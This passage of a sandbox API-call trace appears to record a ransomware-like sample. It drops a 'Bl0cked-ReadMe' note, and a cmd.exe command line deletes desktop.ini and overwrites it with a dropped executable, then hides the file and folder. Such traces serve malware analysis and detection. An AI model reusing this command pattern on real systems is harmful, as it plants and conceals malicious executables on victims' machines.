(hObject=0x120) returned 1 [0236.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\bl0cked-readme.rtf")) returned 0xffffffff [0236.952] GetLastError () returned 0x2 [0236.952] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0236.955] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\bl0cked-readme.rtf")) returned 0x20 [0236.955] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0236.956] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0236.956] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0236.956] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0236.956] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0236.956] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0236.956] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0236.956] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\") returned 0x23 [0236.957] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0236.957] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0236.957] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Outlook Files", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1") returned 0x22 [0236.957] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x146 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\OUTLOO~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\OUTLOO~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\OUTLOO~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\OUTLOO~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x146 [0236.957] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0236.957] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x8e8, dwThreadId=0x458)) returned 1 [0237.101] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) Thread: id = 125 os_tid = 0xf84 Thread: id = 126 os_tid = 0xf88 Thread: id = 127 os_tid = 0xf8c Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0xafc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa88" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 596 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 597 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 598 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 599 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 600 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 601 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 602 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 603 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 604 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 605 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 649 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 650 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 651 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 652 start_va = 0x2c0000 end_va = 0x326fff entry_point = 0x2c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 653 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 654 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 655 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 656 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 657 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 658 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 659 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 660 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 661 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 662 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 663 start_va = 0x3c0000 end_va = 0x487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 664 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 665 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 666 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 667 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 668 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 669 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 670 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 671 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 672 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 721 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 722 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 723 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 724 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 725 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 11 os_tid = 0xb00 [0094.060] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fefc | out: lpSystemTimeAsFileTime=0x18fefc*(dwLowDateTime=0x76f7f7c0, dwHighDateTime=0x1d440a9)) [0094.060] GetCurrentProcessId () returned 0xafc [0094.060] GetCurrentThreadId () returned 0xb00 [0094.060] GetTickCount () returned 0x22ce9 [0094.060] QueryPerformanceCounter (in: lpPerformanceCount=0x18fef4 | out: lpPerformanceCount=0x18fef4*=15084951131) returned 1 [0094.061] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0094.061] __set_app_type (_Type=0x1) [0094.061] __p__fmode () returned 0x76b331f4 [0094.061] __p__commode () returned 0x76b331fc [0094.061] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0094.061] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0094.061] GetCurrentThreadId () returned 0xb00 [0094.062] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb00) returned 0x38 [0094.062] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0094.062] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0094.062] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.062] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.062] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe8c | out: phkResult=0x18fe8c*=0x0) returned 0x2 [0094.062] VirtualQuery (in: lpAddress=0x18fec3, lpBuffer=0x18fe5c, dwLength=0x1c | out: lpBuffer=0x18fe5c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.062] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fe5c, dwLength=0x1c | out: lpBuffer=0x18fe5c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0094.062] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fe5c, dwLength=0x1c | out: lpBuffer=0x18fe5c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0094.062] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fe5c, dwLength=0x1c | out: lpBuffer=0x18fe5c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.062] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fe5c, dwLength=0x1c | out: lpBuffer=0x18fe5c*(BaseAddress=0x190000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0094.062] GetConsoleOutputCP () returned 0x1b5 [0094.062] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0094.062] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0094.062] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.062] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0094.063] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.063] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0094.063] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.063] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.063] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.063] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0094.063] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.063] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0094.063] GetEnvironmentStringsW () returned 0x1d00f8* [0094.063] FreeEnvironmentStringsW (penv=0x1d00f8) returned 1 [0094.064] GetEnvironmentStringsW () returned 0x1d00f8* [0094.064] FreeEnvironmentStringsW (penv=0x1d00f8) returned 1 [0094.064] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18edfc | out: phkResult=0x18edfc*=0x40) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x0, lpData=0x18ee08*=0xf0, lpcbData=0x18ee00*=0x1000) returned 0x2 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x1, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x0, lpData=0x18ee08*=0x1, lpcbData=0x18ee00*=0x1000) returned 0x2 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x0, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x40, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x40, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x0, lpData=0x18ee08*=0x40, lpcbData=0x18ee00*=0x1000) returned 0x2 [0094.064] RegCloseKey (hKey=0x40) returned 0x0 [0094.064] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18edfc | out: phkResult=0x18edfc*=0x40) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x0, lpData=0x18ee08*=0x40, lpcbData=0x18ee00*=0x1000) returned 0x2 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x1, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x0, lpData=0x18ee08*=0x1, lpcbData=0x18ee00*=0x1000) returned 0x2 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x0, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x9, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x4, lpData=0x18ee08*=0x9, lpcbData=0x18ee00*=0x4) returned 0x0 [0094.064] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee04, lpData=0x18ee08, lpcbData=0x18ee00*=0x1000 | out: lpType=0x18ee04*=0x0, lpData=0x18ee08*=0x9, lpcbData=0x18ee00*=0x1000) returned 0x2 [0094.064] RegCloseKey (hKey=0x40) returned 0x0 [0094.064] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886349 [0094.064] srand (_Seed=0x5b886349) [0094.064] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd\"" [0094.064] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd\"" [0094.065] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.065] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1d1858, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0094.065] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.065] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.065] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.065] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0094.065] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0094.065] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0094.065] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0094.065] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0094.065] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0094.065] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0094.065] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0094.065] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0094.065] GetEnvironmentStringsW () returned 0x1d2248* [0094.065] FreeEnvironmentStringsW (penv=0x1d2248) returned 1 [0094.065] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.065] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.065] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0094.065] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0094.066] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0094.066] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0094.066] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0094.066] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0094.066] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0094.066] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0094.066] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fbc8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.066] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fbc8, lpFilePart=0x18fbc4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fbc4*="Desktop") returned 0x18 [0094.066] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0094.066] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f944 | out: lpFindFileData=0x18f944) returned 0x1cff88 [0094.066] FindClose (in: hFindFile=0x1cff88 | out: hFindFile=0x1cff88) returned 1 [0094.066] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f944 | out: lpFindFileData=0x18f944) returned 0x1cff88 [0094.066] FindClose (in: hFindFile=0x1cff88 | out: hFindFile=0x1cff88) returned 1 [0094.066] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f944 | out: 